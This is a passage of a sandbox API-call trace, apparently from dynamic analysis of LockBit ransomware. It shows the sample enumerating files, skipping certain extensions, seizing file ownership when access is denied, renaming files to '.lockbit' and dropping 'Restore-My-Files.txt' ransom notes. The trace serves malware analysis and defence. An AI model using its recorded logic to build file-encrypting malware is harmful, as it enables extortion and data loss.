Shared\\ink\\fsdefinitions\\web\\*") returned 71 [0089.405] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\*"), fInfoLevelId=0x0, lpFindFileData=0x344c7a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344c7a8) returned 0x2e32d0 [0089.405] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.405] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0089.405] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0089.405] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.405] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="webbase.xml", cAlternateFileName="")) returned 1 [0089.405] lstrcmpiW (lpString1=".", lpString2="webbase.xml") returned -1 [0089.405] lstrcmpiW (lpString1="..", lpString2="webbase.xml") returned -1 [0089.405] PathFindExtensionW (pszPath="webbase.xml") returned=".xml" [0089.405] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0089.405] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0089.405] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0089.405] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0089.405] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0089.406] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0089.407] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0089.407] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="webbase.xml") returned -1 [0089.407] lstrcmpiW (lpString1="ntldr", lpString2="webbase.xml") returned -1 [0089.407] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="webbase.xml") returned -1 [0089.407] lstrcmpiW (lpString1="bootsect.bak", lpString2="webbase.xml") returned -1 [0089.407] lstrcmpiW (lpString1="autorun.inf", lpString2="webbase.xml") returned -1 [0089.407] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\") returned="" [0089.407] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml") returned=".xml" [0089.407] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0089.407] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0089.407] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0089.408] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0089.408] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.lockbit") returned 89 [0089.408] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0089.408] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.lockbit")) returned 0 [0089.495] GetLastError () returned 0x5 [0089.495] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0089.495] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0089.495] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0089.495] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0089.496] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0089.496] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0089.499] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0089.499] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0089.563] NtClose (Handle=0x3c0) returned 0x0 [0089.563] RtlFreeAnsiString (AnsiString="\\") [0089.563] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c0) returned 1 [0089.563] malloc (_Size=0x200) returned 0x53fcc0 [0089.563] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0089.563] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0089.563] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0089.563] CloseHandle (hObject=0x3c0) returned 1 [0089.563] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0089.564] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0089.564] free (_Block=0x53fcc0) [0089.564] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0089.564] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.lockbit")) returned 1 [0089.565] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0089.565] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0089.565] malloc (_Size=0x40068) returned 0x206b860 [0089.565] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=1166) returned 1 [0089.565] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0089.604] GetLastError () returned 0x3e5 [0089.604] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web") returned 1 [0089.604] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\Restore-My-Files.txt") returned 90 [0089.604] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0089.605] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0089.605] malloc (_Size=0x40068) returned 0x20abae0 [0089.605] WriteFile (in: hFile=0x3b0, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0089.607] GetLastError () returned 0x3e5 [0089.607] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="webbase.xml", cAlternateFileName="")) returned 0 [0089.607] GetLastError () returned 0x12 [0089.607] FindClose (in: hFindFile=0x2e32d0 | out: hFindFile=0x2e32d0) returned 1 [0089.608] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="web.xml", cAlternateFileName="")) returned 1 [0089.608] lstrcmpiW (lpString1=".", lpString2="web.xml") returned -1 [0089.608] lstrcmpiW (lpString1="..", lpString2="web.xml") returned -1 [0089.608] PathFindExtensionW (pszPath="web.xml") returned=".xml" [0089.608] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0089.608] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0089.609] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0089.610] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0089.610] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="web.xml") returned -1 [0089.610] lstrcmpiW (lpString1="ntldr", lpString2="web.xml") returned -1 [0089.610] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="web.xml") returned -1 [0089.610] lstrcmpiW (lpString1="bootsect.bak", lpString2="web.xml") returned -1 [0089.610] lstrcmpiW (lpString1="autorun.inf", lpString2="web.xml") returned -1 [0089.610] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\") returned="" [0089.610] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned=".xml" [0089.610] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0089.610] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0089.610] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0089.611] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0089.611] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.lockbit") returned 81 [0089.611] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0089.611] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.lockbit")) returned 0 [0089.612] GetLastError () returned 0x5 [0089.612] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0089.612] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0089.612] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0089.612] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0089.613] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0089.613] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0089.613] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0089.614] NtQueryInformationFile (in: FileHandle=0x3c4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0089.629] NtClose (Handle=0x3c4) returned 0x0 [0089.629] RtlFreeAnsiString (AnsiString="\\") [0089.629] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c4) returned 1 [0089.629] malloc (_Size=0x200) returned 0x53fcc0 [0089.629] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0089.629] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0089.629] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0089.630] CloseHandle (hObject=0x3c4) returned 1 [0089.630] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0089.630] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0089.630] free (_Block=0x53fcc0) [0089.630] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0089.630] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.lockbit")) returned 1 [0089.643] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0089.644] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0089.644] malloc (_Size=0x40068) returned 0x206b860 [0089.644] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=207) returned 1 [0089.644] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 